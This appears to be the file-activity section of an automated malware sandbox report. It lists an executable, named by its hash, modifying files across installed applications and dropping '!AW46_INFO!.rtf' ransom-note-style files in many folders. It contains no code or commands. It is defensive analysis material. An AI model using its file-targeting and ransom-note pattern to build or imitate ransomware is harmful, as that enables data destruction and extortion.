7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\uninstall\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ar.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\jfr\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\elevation_service.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\plugins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\cs.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\83.0.4103.106_chrome_installer.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\preloaded_data.pb 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-BR.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-TW.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css 